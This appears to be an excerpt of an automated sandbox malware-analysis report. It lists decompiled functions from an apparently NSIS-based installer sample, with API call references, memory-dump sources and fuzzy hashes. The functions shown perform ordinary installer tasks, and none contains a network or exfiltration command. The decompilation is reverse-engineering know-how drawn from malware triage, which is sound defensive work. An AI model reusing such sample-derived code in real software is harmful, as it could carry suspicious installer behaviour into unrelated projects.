				 *(_t65 - 0x40) = _t55 >> 0x0000001e & 0x00000001;
				if((_t55 & 0x00010000) == 0) {
					_t38 =  *(_t65 - 0x2c) & 0x0000ffff;
				} else {
					_t38 = E00402DA6(0x11);
				}
				 *(_t65 - 0x44) = _t38;
				GetClientRect( *(_t65 + 8), _t65 - 0x60);
				asm("sbb esi, esi");
				_t63 = LoadImageW( ~_t60 &  *0x42a220,  *(_t65 - 0x44),  *(_t65 - 0x38),  *(_t65 - 0x58) *  *(_t65 - 0x18),  *(_t65 - 0x54) *  *(_t65 - 0x40),  *(_t65 - 0x24) & 0x0000fef0);
				_t48 = SendMessageW( *(_t65 + 8), 0x172,  *(_t65 - 0x38), _t63);
				if(_t48 != _t53 &&  *(_t65 - 0x38) == _t53) {
					DeleteObject(_t48);
				}
				if( *((intOrPtr*)(_t65 - 0x30)) >= _t53) {
					_push(_t63);
					E0040644E();
				}
				 *0x42a2a8 =  *0x42a2a8 +  *((intOrPtr*)(_t65 - 4));
				return 0;
			}

0x00401d81
0x00401d85
0x00401d9a
0x00401d87
0x00401d89
0x00401d8f
0x00401d8f
0x00401da0
0x00401da3
0x00401dad
0x00401db0
0x00401db8
0x00401dc9
0x00401dcc
0x00401dd7
0x00401dce
0x00401dd0
0x00401dd0
0x00401ddb
0x00401de5
0x00401e0c
0x00401e1b
0x00401e29
0x00401e31
0x00401e39
0x00401e39
0x00401e42
0x00401e48
0x00402ba4
0x00402ba4
0x00402c2d
0x00402c39

APIs

GetDlgItem.USER32 ref: 00401D9A
GetClientRect.USER32(?,?), ref: 00401DE5
LoadImageW.USER32 ref: 00401E15
SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E29
DeleteObject.GDI32(00000000), ref: 00401E39

Memory Dump Source

Source File: 00000000.00000002.771758418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.771749416.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771772921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771779733.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771816294.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771822433.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771834497.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771843257.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771862430.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3GJ6S3Kwnb.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: ac67a32c1c63d157babab1e4358f55078bade20f941efb87d7a14794f6aec10b
Instruction ID: 2ec253bf93b3ee2af7d9c2e9edfaee5893d577595a7c220e34a49f748079806b
Opcode Fuzzy Hash: ac67a32c1c63d157babab1e4358f55078bade20f941efb87d7a14794f6aec10b
Instruction Fuzzy Hash: 9F212672904119AFCB05CBA4DE45AEEBBB5EF08304F14003AF945F62A0CB389D51DB98

Uniqueness

Uniqueness Score: -1.00%

Function 733316BD Relevance: 7.5, APIs: 5, Instructions: 41
memorylibraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E733316BD(struct HINSTANCE__* _a4, short* _a8) {
				_Unknown_base(*)()* _t7;
				void* _t10;
				int _t14;

				_t14 = WideCharToMultiByte(0, 0, _a8, 0xffffffff, 0, 0, 0, 0);
				_t10 = GlobalAlloc(0x40, _t14);
				WideCharToMultiByte(0, 0, _a8, 0xffffffff, _t10, _t14, 0, 0);
				_t7 = GetProcAddress(_a4, _t10);
				GlobalFree(_t10);
				return _t7;
			}

0x733316d7
0x733316e3
0x733316f0
0x733316f7
0x73331700
0x7333170c

APIs

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,733322D8,?,00000808), ref: 733316D5
GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,733322D8,?,00000808), ref: 733316DC
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,733322D8,?,00000808), ref: 733316F0
GetProcAddress.KERNEL32(733322D8,00000000), ref: 733316F7
GlobalFree.KERNEL32 ref: 73331700

Memory Dump Source

Source File: 00000000.00000002.773267858.0000000073331000.00000020.00000001.01000000.00000005.sdmp, Offset: 73330000, based on PE: true

Associated: 00000000.00000002.773256620.0000000073330000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.773280632.0000000073334000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.773288025.0000000073336000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_73330000_3GJ6S3Kwnb.jbxd

Similarity

API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
String ID:
API String ID: 1148316912-0
Opcode ID: 65004ee08d6193c74d82e9e602b2ca9042a660b7fea5a281d4a0b03c37af8254
Instruction ID: eb2f21d07027baa8217fa9faa8d5c9fd51cf87a15c93e2d0aa38886596a77e53
Opcode Fuzzy Hash: 65004ee08d6193c74d82e9e602b2ca9042a660b7fea5a281d4a0b03c37af8254
Instruction Fuzzy Hash: F9F0AC732061387BE63127A78C4CDDBBE9CDF8B2F5B214215F62C92190866A5D01D7F1

Uniqueness

Uniqueness Score: -1.00%

Function 00404D10 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84
stringCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E00404D10(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
				char _v68;
				char _v132;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t23;
				signed int _t24;
				void* _t31;
				void* _t33;
				void* _t34;
				void* _t44;
				signed int _t46;
				signed int _t50;
				signed int _t52;
				signed int _t53;
				signed int _t55;

				_t23 = _a16;
				_t53 = _a12;
				_t44 = 0xffffffdc;
				if(_t23 == 0) {
					_push(0x14);
					_pop(0);
					_t24 = _t53;
					if(_t53 < 0x100000) {
						_push(0xa);
						_pop(0);
						_t44 = 0xffffffdd;
					}
					if(_t53 < 0x400) {
						_t44 = 0xffffffde;
					}
					if(_t53 < 0xffff3333) {
						_t52 = 0x14;
						asm("cdq");
						_t24 = 1 / _t52 + _t53;
					}
					_t25 = _t24 & 0x00ffffff;
					_t55 = _t24 >> 0;
					_t46 = 0xa;
					_t50 = ((_t24 & 0x00ffffff) + _t25 * 4 + (_t24 & 0x00ffffff) + _t25 * 4 >> 0) % _t46;
				} else {
					_t55 = (_t23 << 0x00000020 | _t53) >> 0x14;
					_t50 = 0;
				}
				_t31 = E00406544(_t44, _t50, _t55,  &_v68, 0xffffffdf);
				_t33 = E00406544(_t44, _t50, _t55,  &_v132, _t44);
				_t34 = E00406544(_t44, _t50, 0x423708, 0x423708, _a8);
				wsprintfW(_t34 + lstrlenW(0x423708) * 2, L"%u.%u%s%s", _t55, _t50, _t33, _t31);
				return SetDlgItemTextW( *0x4291f8, _a4, 0x423708);
			}

0x00404d19
0x00404d1e
0x00404d26
0x00404d27
0x00404d34
0x00404d3c
0x00404d3d
0x00404d3f
0x00404d41
0x00404d43
0x00404d46
0x00404d46
0x00404d4d
0x00404d53
0x00404d53
0x00404d5a
0x00404d61
0x00404d64
0x00404d67
0x00404d67
0x00404d6b
0x00404d7b
0x00404d7d
0x00404d80
0x00404d29
0x00404d29
0x00404d30
0x00404d30
0x00404d88
0x00404d93
0x00404da9
0x00404dba
0x00404dd6

APIs

lstrlenW.KERNEL32(00423708,00423708,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404DB1
wsprintfW.USER32 ref: 00404DBA
SetDlgItemTextW.USER32 ref: 00404DCD

Strings

%u.%u%s%s, xrefs: 00404D9B

Memory Dump Source

Source File: 00000000.00000002.771758418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.771749416.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771772921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771779733.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771816294.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771822433.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771834497.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771843257.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771862430.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3GJ6S3Kwnb.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s
API String ID: 3540041739-3551169577
Opcode ID: 86e502d9a8370dbc93398d3fbd174d64265af359c40653ed6c33f1a653f0c3b2
Instruction ID: e9142b657f1eeb4cf11744ba9db0a0194b5dde25e0a765d2a17d7598676c161e
Opcode Fuzzy Hash: 86e502d9a8370dbc93398d3fbd174d64265af359c40653ed6c33f1a653f0c3b2
Instruction Fuzzy Hash: E911D8736041283BDB10666D9C45FAE3298DF81338F254237FA25F61D1D978D82182D8

Uniqueness

Uniqueness Score: -1.00%

Function 0040248A Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64
registrystringCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E0040248A(void* __eax, int __ebx, intOrPtr __edx, void* __eflags) {
				void* _t20;
				void* _t21;
				int _t24;
				int _t30;
				intOrPtr _t33;
				void* _t34;
				intOrPtr _t37;
				void* _t39;
				void* _t42;

				_t42 = __eflags;
				_t33 = __edx;
				_t30 = __ebx;
				_t37 =  *((intOrPtr*)(_t39 - 0x20));
				_t34 = __eax;
				 *(_t39 - 0x10) =  *(_t39 - 0x1c);
				 *(_t39 - 0x44) = E00402DA6(2);
				_t20 = E00402DA6(0x11);
				 *(_t39 - 4) = 1;
				_t21 = E00402E36(_t42, _t34, _t20, 2);
				 *(_t39 + 8) = _t21;
				if(_t21 != __ebx) {
					_t24 = 0;
					if(_t37 == 1) {
						E00402DA6(0x23);
						_t24 = lstrlenW(0x40b5c8) + _t29 + 2;
					}
					if(_t37 == 4) {
						 *0x40b5c8 = E00402D84(3);
						 *((intOrPtr*)(_t39 - 0x38)) = _t33;
						_t24 = _t37;
					}
					if(_t37 == 3) {
						_t24 = E004032B4( *((intOrPtr*)(_t39 - 0x24)), _t30, 0x40b5c8, 0x1800);
					}
					if(RegSetValueExW( *(_t39 + 8),  *(_t39 - 0x44), _t30,  *(_t39 - 0x10), 0x40b5c8, _t24) == 0) {
						 *(_t39 - 4) = _t30;
					}
					_push( *(_t39 + 8));
					RegCloseKey();
				}
				 *0x42a2a8 =  *0x42a2a8 +  *(_t39 - 4);
				return 0;
			}

0x0040248a
0x0040248a
0x0040248a
0x0040248a
0x0040248d
0x00402494
0x0040249e
0x004024a1
0x004024aa
0x004024b1
0x004024b8
0x004024bb
0x004024c1
0x004024cb
0x004024cf
0x004024da
0x004024da
0x004024e1
0x004024eb
0x004024f1
0x004024f4
0x004024f4
0x004024f8
0x00402504
0x00402504
0x0040251d
0x0040251f
0x0040251f
0x00402522
0x004025fd
0x004025fd
0x00402c2d
0x00402c39

APIs

lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsj9DE8.tmp,00000023,00000011,00000002), ref: 004024D5
RegSetValueExW.ADVAPI32(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsj9DE8.tmp,00000000,00000011,00000002), ref: 00402515
RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsj9DE8.tmp,00000000,00000011,00000002), ref: 004025FD

Strings

C:\Users\user\AppData\Local\Temp\nsj9DE8.tmp, xrefs: 004024C6, 004024D4, 004024EB, 004024FF, 0040250A

Memory Dump Source

Source File: 00000000.00000002.771758418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.771749416.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771772921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771779733.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771816294.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771822433.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771834497.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771843257.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771862430.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3GJ6S3Kwnb.jbxd

Similarity

API ID: CloseValuelstrlen
String ID: C:\Users\user\AppData\Local\Temp\nsj9DE8.tmp
API String ID: 2655323295-1964625248
Opcode ID: 861f193ed713728b6608d55f4f34c9aa4f20ee75e1065734592e0effa691dc87
Instruction ID: 742bbefa47e989f243bf6062c522ac596cbc11b4bfeba2949f21d1d9b27b1258
Opcode Fuzzy Hash: 861f193ed713728b6608d55f4f34c9aa4f20ee75e1065734592e0effa691dc87
Instruction Fuzzy Hash: 8B11AC71E00108BEEB10AFA1DE49EAEBAB8FF44358F10403AF404B61C1D7B88D409A68

Uniqueness

Uniqueness Score: -1.00%

Function 00405DD6 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16
stringCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E00405DD6(WCHAR* _a4) {
				WCHAR* _t9;

				_t9 = _a4;
				_push( &(_t9[lstrlenW(_t9)]));
				_push(_t9);
				if( *(CharPrevW()) != 0x5c) {
					lstrcatW(_t9, 0x40a014);
				}
				return _t9;
			}

0x00405dd7
0x00405de4
0x00405de5
0x00405df0
0x00405df8
0x00405df8
0x00405e00

APIs

lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004034E4,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 00405DDC
CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004034E4,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 00405DE6
lstrcatW.KERNEL32(?,0040A014), ref: 00405DF8

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405DD6

Memory Dump Source

Source File: 00000000.00000002.771758418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.771749416.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771772921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771779733.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771816294.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771822433.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771834497.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771843257.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771862430.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3GJ6S3Kwnb.jbxd

Similarity

API ID: CharPrevlstrcatlstrlen
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 2659869361-3081826266
Opcode ID: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
Instruction ID: 7ce36c7f15bc9200e130dd8400e4741a81934e97230acaa32a90c98a69430a15
Opcode Fuzzy Hash: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
Instruction Fuzzy Hash: 09D0A7311019347AC1117B44AC04DDF67ACEE86304381403BF101B70A4CB7C5D518BFD

Uniqueness

Uniqueness Score: -1.00%

Function 733310E1 Relevance: 6.4, APIs: 5, Instructions: 145
memoryCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E733310E1(signed int _a8, intOrPtr* _a12, void* _a16, void* _a20) {
				void* _v0;
				void* _t27;
				signed int _t29;
				void* _t30;
				void* _t34;
				void* _t36;
				void* _t38;
				void* _t40;
				void* _t48;
				void* _t54;
				void* _t63;
				void* _t64;
				signed int _t66;
				void* _t67;
				void* _t73;
				void* _t74;
				void* _t77;
				void* _t80;
				void _t81;
				void _t82;
				intOrPtr _t84;
				void* _t86;
				void* _t88;

				 *0x7333506c = _a8;
				 *0x73335070 = _a16;
				 *0x73335074 = _a12;
				_a12( *0x73335048, E73331651, _t73);
				_t66 =  *0x7333506c +  *0x7333506c * 4 << 3;
				_t27 = E733312E3();
				_v0 = _t27;
				_t74 = _t27;
				if( *_t27 == 0) {
					L28:
					return GlobalFree(_t27);
				}
				do {
					_t29 =  *_t74 & 0x0000ffff;
					_t67 = 2;
					_t74 = _t74 + _t67;
					_t88 = _t29 - 0x66;
					if(_t88 > 0) {
						_t30 = _t29 - 0x6c;
						if(_t30 == 0) {
							L23:
							_t31 =  *0x73335040;
							if( *0x73335040 == 0) {
								goto L26;
							}
							E73331603( *0x73335074, _t31 + 4, _t66);
							_t34 =  *0x73335040;
							_t86 = _t86 + 0xc;
							 *0x73335040 =  *_t34;
							L25:
							GlobalFree(_t34);
							goto L26;
						}
						_t36 = _t30 - 4;
						if(_t36 == 0) {
							L13:
							_t38 = ( *_t74 & 0x0000ffff) - 0x30;
							_t74 = _t74 + _t67;
							_t34 = E73331312(E7333135A(_t38));
							L14:
							goto L25;
						}
						_t40 = _t36 - _t67;
						if(_t40 == 0) {
							L11:
							_t80 = ( *_t74 & 0x0000ffff) - 0x30;
							_t74 = _t74 + _t67;
							_t34 = E73331381(_t80, E733312E3());
							goto L14;
						}
						L8:
						if(_t40 == 1) {
							_t81 = GlobalAlloc(0x40, _t66 + 4);
							_t10 = _t81 + 4; // 0x4
							E73331603(_t10,  *0x73335074, _t66);
							_t86 = _t86 + 0xc;
							 *_t81 =  *0x73335040;
							 *0x73335040 = _t81;
						}
						goto L26;
					}
					if(_t88 == 0) {
						_t48 =  *0x73335070;
						_t77 =  *_t48;
						 *_t48 =  *_t77;
						_t49 = _v0;
						_t84 =  *((intOrPtr*)(_v0 + 0xc));
						if( *((short*)(_t77 + 4)) == 0x2691) {
							E73331603(_t49, _t77 + 8, 0x38);
							_t86 = _t86 + 0xc;
						}
						 *((intOrPtr*)( *_a12 + 0xc)) = _t84;
						GlobalFree(_t77);
						goto L26;
					}
					_t54 = _t29 - 0x46;
					if(_t54 == 0) {
						_t82 = GlobalAlloc(0x40,  *0x7333506c +  *0x7333506c + 8);
						 *((intOrPtr*)(_t82 + 4)) = 0x2691;
						_t14 = _t82 + 8; // 0x8
						E73331603(_t14, _v0, 0x38);
						_t86 = _t86 + 0xc;
						 *_t82 =  *( *0x73335070);
						 *( *0x73335070) = _t82;
						goto L26;
					}
					_t63 = _t54 - 6;
					if(_t63 == 0) {
						goto L23;
					}
					_t64 = _t63 - 4;
					if(_t64 == 0) {
						 *_t74 =  *_t74 + 0xa;
						goto L13;
					}
					_t40 = _t64 - _t67;
					if(_t40 == 0) {
						 *_t74 =  *_t74 + 0xa;
						goto L11;
					}
					goto L8;
					L26:
				} while ( *_t74 != 0);
				_t27 = _v0;
				goto L28;
			}

0x733310eb
0x73331100
0x73331109
0x7333110e
0x73331119
0x7333111c
0x73331125
0x73331129
0x7333112b
0x733312b0
0x733312ba
0x733312ba
0x73331132
0x73331132
0x73331137
0x73331138
0x7333113a
0x7333113d
0x73331256
0x73331259
0x73331271
0x73331271
0x73331278
0x00000000
0x00000000
0x73331285
0x7333128a
0x7333128f
0x73331294
0x7333129a
0x7333129b
0x00000000
0x7333129b
0x7333125b
0x7333125e
0x733311bc
0x733311bf
0x733311c2
0x733311cb
0x733311d0
0x00000000
0x733311d1
0x73331264
0x73331266
0x733311a2
0x733311a5
0x733311a8
0x733311b1
0x00000000
0x733311b1
0x73331164
0x73331165
0x73331177
0x73331180
0x73331184
0x7333118e
0x73331191
0x73331193
0x73331193
0x00000000
0x73331165
0x73331143
0x73331218
0x7333121d
0x73331221
0x73331223
0x7333122c
0x7333122f
0x73331238
0x7333123d
0x7333123d
0x73331247
0x7333124a
0x00000000
0x73331250
0x73331149
0x7333114c
0x733311e9
0x733311ed
0x733311f7
0x733311fb
0x73331205
0x7333120a
0x73331211
0x00000000
0x73331211
0x73331152
0x73331155
0x00000000
0x00000000
0x7333115b
0x7333115e
0x733311b8
0x00000000
0x733311b8
0x73331160
0x73331162
0x7333119e
0x00000000
0x7333119e
0x00000000
0x733312a1
0x733312a1
0x733312ab
0x00000000

APIs

GlobalAlloc.KERNEL32(00000040,?), ref: 73331171
GlobalAlloc.KERNEL32(00000040,?), ref: 733311E3
GlobalFree.KERNEL32 ref: 7333124A
GlobalFree.KERNEL32 ref: 7333129B
GlobalFree.KERNEL32 ref: 733312B1

Memory Dump Source

Source File: 00000000.00000002.773267858.0000000073331000.00000020.00000001.01000000.00000005.sdmp, Offset: 73330000, based on PE: true

Associated: 00000000.00000002.773256620.0000000073330000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.773280632.0000000073334000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.773288025.0000000073336000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_73330000_3GJ6S3Kwnb.jbxd

Similarity

API ID: Global$Free$Alloc
String ID:
API String ID: 1780285237-0
Opcode ID: 85eb09ceea8979cc46bc9387993c062a859a495fc04374fd3f046f8f30967ef4
Instruction ID: 8ce6b4a941eeb86dbeff46f3c2a61360ed152f57d90261a9dc0dc02073e91843
Opcode Fuzzy Hash: 85eb09ceea8979cc46bc9387993c062a859a495fc04374fd3f046f8f30967ef4
Instruction Fuzzy Hash: 81516DB6D04201DFE720AF69C944BA67BBCFB0A315F94C11AF94ADB250EB39D941CB50

Uniqueness

Uniqueness Score: -1.00%

Function 0040263E Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 65
stringCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E0040263E(void* __ebx, void* __edx, intOrPtr* __edi) {
				signed int _t14;
				int _t17;
				void* _t24;
				intOrPtr* _t29;
				void* _t31;
				signed int _t32;
				void* _t35;
				void* _t40;
				signed int _t42;

				_t29 = __edi;
				_t24 = __ebx;
				_t14 =  *(_t35 - 0x28);
				_t40 = __edx - 0x38;
				 *(_t35 - 0x10) = _t14;
				_t27 = 0 | _t40 == 0x00000000;
				_t32 = _t40 == 0;
				if(_t14 == __ebx) {
					if(__edx != 0x38) {
						_t17 = lstrlenW(E00402DA6(0x11)) + _t16;
					} else {
						E00402DA6(0x21);
						E00406529("C:\Users\jones\AppData\Local\Temp\nsj9DE8.tmp", "C:\Users\jones\AppData\Local\Temp\nsj9DE8.tmp\System.dll", 0x400);
						_t17 = lstrlenA("C:\Users\jones\AppData\Local\Temp\nsj9DE8.tmp\System.dll");
					}
				} else {
					E00402D84(1);
					 *0x40adc8 = __ax;
					 *((intOrPtr*)(__ebp - 0x44)) = __edx;
				}
				 *(_t35 + 8) = _t17;
				if( *_t29 == _t24) {
					L13:
					 *((intOrPtr*)(_t35 - 4)) = 1;
				} else {
					_t31 = E00406467(_t27, _t29);
					if((_t32 |  *(_t35 - 0x10)) != 0 ||  *((intOrPtr*)(_t35 - 0x24)) == _t24 || E004060D8(_t31, _t31) >= 0) {
						_t14 = E004060A9(_t31, "C:\Users\jones\AppData\Local\Temp\nsj9DE8.tmp\System.dll",  *(_t35 + 8));
						_t42 = _t14;
						if(_t42 == 0) {
							goto L13;
						}
					} else {
						goto L13;
					}
				}
				 *0x42a2a8 =  *0x42a2a8 +  *((intOrPtr*)(_t35 - 4));
				return 0;
			}

0x0040263e
0x0040263e
0x0040263e
0x00402643
0x00402646
0x00402649
0x0040264e
0x00402650
0x00402670
0x004026aa
0x00402672
0x00402674
0x00402688
0x00402695
0x00402695
0x00402652
0x00402654
0x00402659
0x00402667
0x0040266a
0x004026af
0x004026b2
0x0040292e
0x0040292e
0x004026b8
0x004026c1
0x004026c3
0x004026e2
0x004015b4
0x004015b6
0x00000000
0x004015bc
0x00000000
0x00000000
0x00000000
0x004026c3
0x00402c2d
0x00402c39

APIs

lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsj9DE8.tmp\System.dll), ref: 00402695

Strings

C:\Users\user\AppData\Local\Temp\nsj9DE8.tmp, xrefs: 00402683
C:\Users\user\AppData\Local\Temp\nsj9DE8.tmp\System.dll, xrefs: 00402659, 0040267E, 00402690, 004026DC

Memory Dump Source

Source File: 00000000.00000002.771758418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.771749416.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771772921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771779733.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771816294.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771822433.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771834497.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771843257.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771862430.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3GJ6S3Kwnb.jbxd

Similarity

API ID: lstrlen
String ID: C:\Users\user\AppData\Local\Temp\nsj9DE8.tmp$C:\Users\user\AppData\Local\Temp\nsj9DE8.tmp\System.dll
API String ID: 1659193697-628140521
Opcode ID: 4e68c4071cc5d54150e14a2846a5828742e5422a2b5b84857c7965bcff602054
Instruction ID: 065fa95b7f6ceba1475350b2e5fd0629383d1058fb688f50996a10954fc95768
Opcode Fuzzy Hash: 4e68c4071cc5d54150e14a2846a5828742e5422a2b5b84857c7965bcff602054
Instruction Fuzzy Hash: D011E772B00305BBCB10BBB18E4AE9E76B0AF40749F21443FF002B62C1D6FD8891965E

Uniqueness

Uniqueness Score: -1.00%

Function 00403019 Relevance: 6.0, APIs: 4, Instructions: 33
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403019(intOrPtr _a4) {
				long _t2;
				struct HWND__* _t3;
				struct HWND__* _t6;

				if(_a4 == 0) {
					__eflags =  *0x420ec0; // 0x0
					if(__eflags == 0) {
						_t2 = GetTickCount();
						__eflags = _t2 -  *0x42a22c;
						if(_t2 >  *0x42a22c) {
							_t3 = CreateDialogParamW( *0x42a220, 0x6f, 0, E00402F93, 0);
							 *0x420ec0 = _t3;
							return ShowWindow(_t3, 5);
						}
						return _t2;
					} else {
						return E00406910(0);
					}
				} else {
					_t6 =  *0x420ec0; // 0x0
					if(_t6 != 0) {
						_t6 = DestroyWindow(_t6);
					}
					 *0x420ec0 = 0;
					return _t6;
				}
			}

0x00403020
0x0040303a
0x00403040
0x0040304a
0x00403050
0x00403056
0x00403067
0x00403070
0x00000000
0x00403075
0x0040307c
0x00403042
0x00403049
0x00403049
0x00403022
0x00403022
0x00403029
0x0040302c
0x0040302c
0x00403032
0x00403039
0x00403039

APIs

DestroyWindow.USER32(00000000,00000000,004031F7,00000001,?,?,?,?,?,00403847,?), ref: 0040302C
GetTickCount.KERNEL32 ref: 0040304A
CreateDialogParamW.USER32 ref: 00403067
ShowWindow.USER32(00000000,00000005,?,?,?,?,?,00403847,?), ref: 00403075

Memory Dump Source

Source File: 00000000.00000002.771758418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.771749416.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771772921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771779733.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771816294.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771822433.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771834497.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771843257.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771862430.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3GJ6S3Kwnb.jbxd

Similarity

API ID: Window$CountCreateDestroyDialogParamShowTick
String ID:
